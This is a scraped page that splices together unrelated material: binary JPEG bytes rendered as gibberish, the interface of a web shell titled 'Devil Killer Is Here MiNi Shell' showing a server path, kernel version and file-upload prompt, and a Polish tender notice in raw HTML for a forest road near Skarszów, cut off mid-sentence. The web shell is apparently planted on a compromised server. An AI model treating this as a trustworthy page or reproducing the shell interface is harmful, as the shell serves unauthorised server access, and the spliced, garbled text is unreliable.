JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20220131/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20220131/0004174801-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> &#34;Budowa drogi leśnej nr 019 (dojazd pożarowy nr 15) w Leśnictwie Skarszów - II Postępowanie </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">NADLEŚNICTWO LEŚNY DWÓR Z/S W ŁYSOMICZKACH</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 770528331</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">2</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Łysomiczki</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">76-248</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">pomorskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL636 - Słupski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">598131250</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">lesnydwor@szczecinek.lasy.gov.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://lesny-dwor.szczecinek.lasy.gov.pl/de/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - inna państwowa jednostka organizacyjna nieposiadająca osobowości prawnej</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Inna działalność</span> </h3> <p class="mb-0"> Gospodarka leśna </p> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> &#34;Budowa drogi leśnej nr 019 (dojazd pożarowy nr 15) w Leśnictwie Skarszów - II Postępowanie </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-9a4e8176-8285-11ec-beb3-a2bfa38226ab</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00041748</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-01-31</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://portal.smartpzp.pl/nadl.lesnydwor <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">Komunikacja między Zamawiającym, a Wykonawcami odbywa się przy użyciu Platformy SmartPZP (dalej – „Platforma”), a także za pośrednictwem poczty elektronicznej na adres: ewelina.malek@szczecinek.lasy.gov.pl.<br/>Wszelkie oświadczenia, wnioski, zawiadomienia oraz informacje, przekazywane przy użyciu Platformy SmatPZP przekazywane są w formie elektronicznej, w zakładce „Korespondencja”. Adres strony internetowej, na której udostępniane będą zmiany i wyjaśnienia treści specyfikacji warunków zamówienia („SWZ”) oraz inne dokumenty zamówienia bezpośrednio związane z postępowaniem o<br/>udzielenie zamówienia: https://portal.smartpzp.pl/nadl.lesnydwor. Pełen opis w SWZ.</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Minimalne<br/>wymagania techniczne dotyczące korzystania z Platformy:<br/>a) przesyłane dokumenty powinny być załączone w formie plików w formacie odpowiednio . png, .jpg,.jpeg, .gif, .doc, .docx, .xls, .xlsx, .ppt, .pptx, .odt, .ods, .odp, .odf, .pdf, .zip, .rar, .7zip, .txt, .ath, .xml,.dwg, .xades, .tar, .7z, .eml, .msg,<br/>b) wymagania sprzętowe dla Wykonawcy:<br/>- przeglądarka internetowa Mozzilla Firefox ver. 65 i późniejsze, Google Chrome ver. 66 i późniejsze lubOpera ver. 58 i późniejsze, Microsoft Edge ver 18 i późniejsze, Internet Explorer 11,<br/>- lista zalecanych przeglądarek internetowych: Google Chrome, Mozilla Firefox, Opera. Zalecane jest używanie najnowszych wersji przeglądarek,<br/>- system operacyjny Windows 7 i późniejsze,<br/>- zainstalowane środowisko Java w wersji min. 1.8 (jre),<br/>- w przypadku przeglądarek Opera, Chrome i Firefox należy doinstalować dodatek do przeglądarki Szafir SDK Web,<br/>- oprogramowanie SzafirHost w systemie operacyjnym,<br/>- stały dostęp do sieci Internet o gwarantowanej przepustowości nie mniejszej niż 1 Mb/s,<br/>- komputer klasy PC lub MAC, o następującej konfiguracji: pamięć min. 3 GB RAM, procesor 1500 MHz lub lepszy, jeden z systemów operacyjnych Linux Kernel 4.0, Windows 7 i MacOS 10.12 - lub ich nowsze wersje,<br/>- zainstalowany program Acrobat Reader lub inny umożliwiający obsługę formatów .pdf. Pozostałe wymagania techniczne i organizacyjne wysyłania i odbierania dokumentów elektronicznych, elektronicznych kopii dokumentów i oświadczeń oraz informacji przekazywanych przy ich użyciu opisane zostały w Regulaminie korzystania z Platformy.<br/>Pełen opis w SWZ.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Stosownie do art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych osobowych)(Dz. Urz. UE L<br/>119 z 04 maja 2016 r., str. 1 – „RODO”) Zamawiający informuje, iż administratorem danych osobowych jest Nadleśniczy Nadleśnictwa Leśny Dwór. Administrator wyznaczył Inspektora Ochrony Danych Osobowych p. Grzegorza Goliszek, z którym w sprawach dotyczących przetwarzania danych<br/>osobowych można skontaktować się za pośrednictwem poczty elektronicznej pod adresem lesnydwor@szczecinek.lasy.gov.pl lub telefonicznie pod numerem 59 8131 250. Zamawiający przetwarza dane osobowe zebrane w niniejszym postępowaniu o udzielenie zamówienia publicznego w sposób gwarantujący zabezpieczenie przed ich bezprawnym rozpowszechnianiem.<br/>Zamawiający udostępnia dane osobowe, o których mowa w art. 10 RODO w celu umożliwienia korzystania ze środków ochrony prawnej, o których mowa w dziale IX PZP, do upływu terminu do ich wniesienia. Do przetwarzania danych osobowych, o których mowa w art. 10 RODO mogą być dopuszczone<br/>wyłącznie osoby posiadające upoważnienie. Osoby dopuszczone do przetwarzania takich danych są obowiązane do zachowania ich w poufności<br/>Dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z prowadzeniem niniejszego postępowania o udzielenie zamówienia publicznego oraz jego rozstrzygnięciem, jak również, jeżeli nie ziszczą się przesłanki określone w art. 255-256 PZP – w celu zawarcia umowy w sprawie zamówienia publicznego oraz jej realizacji, a także udokumentowania postępowania o udzielenie zamówienia i jego archiwizacji.<br/>Odbiorcami danych osobowych będą osoby lub podmioty, którym dokumentacja postępowania zostanie udostępniona w oparciu o przepisy PZP. Dane osobowe pozyskane w związku z prowadzeniem niniejszego postępowania o udzielenie zamówienia publicznego będą przechowywane, zgodnie z art. 78 ust. 1 PZP, przez okres 4 lat od dnia<br/>zakończenia postępowania o udzielenie zamówienia publicznego, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas trwania umowy w sprawie zamówienia publicznego. Niezależnie od postanowień pkt 19.7. powyżej, w przypadku zawarcia umowy w sprawie zamówienia publicznego, dane osobowe będą przetwarzane do upływu okresu przedawnienia roszczeń wynikających z umowy w sprawie zamówienia publicznego. Dane osobowe pozyskane w związku z prowadzeniem niniejszego postępowania o udzielenie<br/>zamówienia mogą zostać przekazane podmiotom świadczącym usługi doradcze, w tym usługi prawne, i konsultingowe,<br/>Stosownie do art. 22 RODO, decyzje dotyczące danych osobowych nie będą podejmowane w sposób zautomatyzowany. Pełen opis w SWZ.</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Osoba, której dotyczą pozyskane w związku z<br/>prowadzeniem niniejszego postępowania dane osobowe, ma prawo:<br/>1) dostępu do swoich danych osobowych – zgodnie z art. 15 RODO, przy czym w sytuacji, gdy<br/>wykonanie obowiązków, o których mowa w art. 15 ust. 1 -3 RODO wymagałoby niewspółmiernie<br/>dużego wysiłku Zamawiający może żądać wskazania dodatkowych informacji mających na celu sprecyzowanie żądania, w szczególności podania nazwy lub daty bieżącego bądź zakończonego<br/>postępowania o udzielenie zamówienia publicznego;<br/>2) do sprostowana swoich danych osobowych – zgodnie z art. 16 RODO, przy czym skorzystanie z<br/>uprawnienia do sprostowania lub uzupełnienia danych osobowych, o którym mowa w art. 16 RODO,<br/>nie może skutkować zmianą wyniku postępowania o udzielenie zamówienia publicznego, ani zmianą<br/>postanowień umowy w zakresie niezgodnym z PZP oraz nie może naruszać integralności protokołu<br/>oraz jego załączników;<br/>3) do żądania od Zamawiającego – jako administratora, ograniczenia przetwarzania danych<br/>osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO, przy czym prawo do<br/>ograniczenia przetwarzania nie ma zastosowania w odniesieniu do przechowywania, w celu<br/>zapewnienia korzystania ze środków ochrony prawnej lub w celu ochrony praw innej osoby fizycznej<br/>lub prawnej, lub z uwagi na ważne względy interesu publicznego Unii Europejskiej lub państwa<br/>członkowskiego; prawo to nie ogranicza przetwarzania danych osobowych do czasu zakończenia<br/>postępowania o udzielenie zamówienia publicznego;<br/>4) wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych w przypadku uznania, iż<br/>przetwarzanie jej danych osobowych narusza przepisy o ochronie danych osobowych, w tym przepisy<br/>RODO.<br/>19.12. Obowiązek podania danych osobowych jest wymogiem ustawowym określonym w przepisach<br/>PZP, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego; konsekwencje<br/>niepodania określonych danych określa PZP.<br/>19.13. Osobie, której dane osobowe zostały pozyskane przez Zamawiającego w związku z<br/>prowadzeniem niniejszego postępowania o udzielenie zamówienia publicznego nie przysługuje:<br/>1) prawo do usunięcia danych osobowych, o czym przesadza art. 17 ust. 3 lit. b, d lub e RODO,<br/>2) prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO, określone w art. 21<br/>RODO prawo sprzeciwu wobec przetwarzania danych osobowych, a to z uwagi na fakt, że podstawą<br/>prawną przetwarzania danych osobowych jest art. 6 ust. 1 lit. c RODO.<br/>19.14. Dane osobowe mogą być przekazywane do organów publicznych i urzędów państwowych lub<br/>innych podmiotów upoważnionych na podstawie przepisów prawa lub wykonujących zadania<br/>realizowane w interesie publicznym lub w ramach sprawowania władzy publicznej, w szczególności do<br/>podmiotów prowadzących działalność kontrolną wobec Zamawiającego. Dane osobowe są<br/>przekazywane do podmiotów przetwarzających dane w imieniu administratora danych osobowych.<br/>Pełen opis w SWZ.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">SA.270.1.1.2022</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.5.) Wartość zamówienia: <span class="normal"> 80000,00 PLN </span> </h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest budowa drogi leśnej nr 019 w Leśnictwie Skarszów na dz. Nr 171, 184, 170/12 obręb Skarszów, gm. Dębnica Kaszubska na podstawie decyzji o pozwoleniu na budowę. Na powyższe zadanie został sporządzony projekt budowlany zatwierdzony decyzją Starosty Słupskiego nr 1031/2021. Celem budowy jest dostosowanie parametrów technicznych drogi w zakresie przekroju i konstrukcji jezdni do przeniesienia obciążeń od pojazdów wysokotonażowych uczestniczących w ruchu transportu leśnego. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45233120-6 - Roboty w zakresie budowy dróg</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45111200-0 - Roboty w zakresie przygotowania terenu pod budowę i roboty ziemne</p> <p class="mb-0">45233220-7 - Roboty w zakresie nawierzchni dróg</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">2 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy wyborze oferty Zamawiający będzie się kierował następującym<br/>kryterium oceny ofert:<br/>1) Cena – 60 %,<br/>2) Okres gwarancji – 40 %.<br/>Sposób obliczania punktów:<br/>1) W ramach kryterium „Cena” ocena ofert zostanie dokonana przy zastosowaniu wzoru:<br/>Cn<br/>C = ------------ x100 pkt x 60 %<br/>Co<br/>gdzie:<br/>C – liczba punktów w ramach kryterium „Cena”,<br/>Cn - najniższa cena spośród ofert ocenianych<br/>Co - cena oferty ocenianej<br/>Ocenie w ramach kryterium „Cena” podlegać będzie cena łączna brutto podana<br/>w Ofercie (załącznik nr 1 do SWZ). Z uwagi na postanowienia art. 225 ust. 1 PZP, jeżeli złożono ofertę,<br/>której wybór prowadziłby do powstania u Zamawiającego obowiązku podatkowego zgodnie z<br/>przepisami o podatku od towarów i usług, Zamawiający w celu oceny takiej oferty dolicza do<br/>przedstawionej w niej ceny podatek od towarów i usług, który miałby obowiązek rozliczyć zgodnie z<br/>tymi przepisami.<br/>2) W ramach kryterium „Gwarancja” ocena ofert zostanie dokonana w następujący sposób:<br/>- oferta z gwarancją 24 miesięcy – 0 pkt.<br/>- oferta z gwarancją 36 miesięcy – 20 pkt.<br/>- oferta z gwarancją 48 miesięcy – 40 pkt.<br/>Wykonawca zamieści informację o przyjęciu na siebie zobowiązania umownego dot. okresu gwarancji<br/>w formularzu oferty (załącznik nr 1 do SWZ). W przypadku braku wskazania przez Wykonawcę okresu<br/>gwarancji, uznaje się, że Wykonawca przyjmuje okres gwarancji najkrótszy (24 miesięce) i otrzymuje 0<br/>pkt w ramach niniejszego kryterium oceny ofert. W przypadku wskazania przez Wykonawcę okresu<br/>gwarancji krótszego niż 24 miesiące oferta podlega odrzuceniu jako niezgodna z SWZ.<br/>Wykonawca powinien zaoferować okres gwarancji w pełnych okresach i miesiącach tj.: 24, 36, 48 (i<br/>więcej miesięcy), przy czym najdłuższy możliwy okres gwarancji uwzględniony do oceny ofert to 48<br/>miesięcy.<br/>Za najkorzystniejszą ofertę uznana zostanie Oferta Wykonawcy, która uzyska największą sumę punktów uzyskanych w ww. kryteriach oceny ofert. Oferta może uzyskać maksymalnie 100 punktów.<br/>Jeżeli nie można dokonać wyboru najkorzystniejszej oferty z uwagi na to, że dwie lub więcej ofert<br/>przedstawia taki sam bilans ceny i innych kryteriów oceny ofert, Zamawiający wybiera spośród tych<br/>ofert ofertę, która otrzymała najwyższą ocenę w kryterium o najwyższej wadze. Jeżeli oferty otrzymały<br/>taką samą ocenę w kryterium o najwyższej wadze, Zamawiający wybiera ofertę z najniższą ceną.<br/>Jeżeli nie można dokonać wyboru oferty w sposób, o którym mowa w zdaniu poprzednim,<br/>Zamawiający wzywa Wykonawców, którzy złożyli te oferty, do złożenia w terminie określonym przez<br/>Zamawiającego ofert dodatkowych zawierających nową cenę. Pełen opis w SWZ</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 1</p> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 8</p> <p class="mb-0">Art. 109 ust. 1 pkt 10</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> W postępowaniu mogą brać udział Wykonawcy, którzy spełniają warunki udziału w postępowaniu dotyczące:<br/>1) zdolności do występowania w obrocie gospodarczym<br/>Zamawiający nie formułuje warunku udziału w postępowaniu w odniesieniu<br/>do zdolności do występowania w obrocie gospodarczym.<br/>2) uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej<br/>Zamawiający nie formułuje warunku udziału w postępowaniu w odniesieniu<br/>do warunku posiadania uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej.<br/>3) sytuacji ekonomicznej lub finansowej<br/>Zamawiający nie stawia szczególnych wymagań w zakresie opisu spełniania warunku udziału w postępowaniu w odniesieniu do warunku dot. sytuacji ekonomicznej.<br/>Warunek w odniesieniu do sytuacji finansowej, zostanie spełniony, jeśli Wykonawca wykaże, że posiada środki finansowe lub zdolność kredytową nie mniejszą niż: 10 000 zł (słownie: dziesięć tys. zł).<br/>4) zdolności technicznej lub zawodowej<br/>a) Warunek ten, w zakresie doświadczenia, zostanie uznany za spełniony, jeśli Wykonawca<br/>wykaże, że w okresie ostatnich 5 lat liczonych wstecz od dnia w którym upływa termin składania ofert (a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie) zrealizował co najmniej 1 robotę budowlaną (przez 1 robotę rozumie się wykonywanie robót na podstawie 1 umowy) polegającą na budowie lub przebudowie dróg, na kwotę nie mniejszą niż 40 000 zł brutto (słownie: czterdzieści tysięcy zł).<br/>b) Warunek ten, w zakresie osób skierowanych przez Wykonawcę<br/>do realizacji zamówienia, zostanie uznany za spełniony, jeśli Wykonawca wykaże, że dysponuje<br/>lub będzie dysponować:<br/>co najmniej 1 osobą, która będzie pełniła funkcję kierownika budowy, posiadającą uprawnienia* budowlane w specjalności inżynieryjnej drogowej, uprawniające do kierowania robotami drogowymi.<br/>Zamawiający wymaga ponadto od wyżej wymienionej osoby minimum 3-letniego doświadczenia zawodowego (liczone od dnia uzyskania uprawnień) w kierowaniu robotami budowlanymi w ww. specjalności na stanowisku kierownika budowy lub kierownika robót drogowych, przy czym<br/>zasadą jest, że nakładające się na siebie okresy kierowania robotami nie sumują się.<br/>*Uprawnienia wydane zgodnie z art. 12, art. 12a oraz art. 14 ustawy<br/>z dnia 7 lipca 1994 r. Prawo budowlane (t.j. Dz. U. z 2020 r. poz. 1333<br/>z późn. zm.) lub odpowiadające im ważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów lub odpowiadające im uprawnienia wydane obywatelom państw Europejskiego Obszaru Gospodarczego oraz Konfederacji Szwajcarskiej, z<br/>zastrzeżeniem art. 12a oraz innych przepisów ustawy Prawo budowlane oraz ustawy z dnia 22 grudnia 2015 r. o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej (t.j. Dz. U. z 2020 r., poz. 220).<br/>Pełny opis w SWZ. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">W celu potwierdzenia spełniania warunków udziału w postępowaniu, o<br/>których mowa w pkt 6.1. Zamawiający przed udzieleniem zamówienia, działając na podstawie art. 274<br/>ust. 1 PZP wezwie Wykonawcę, którego oferta została najwyżej oceniona, do złożenia w wyznaczonym, nie krótszym niż 5 dni, 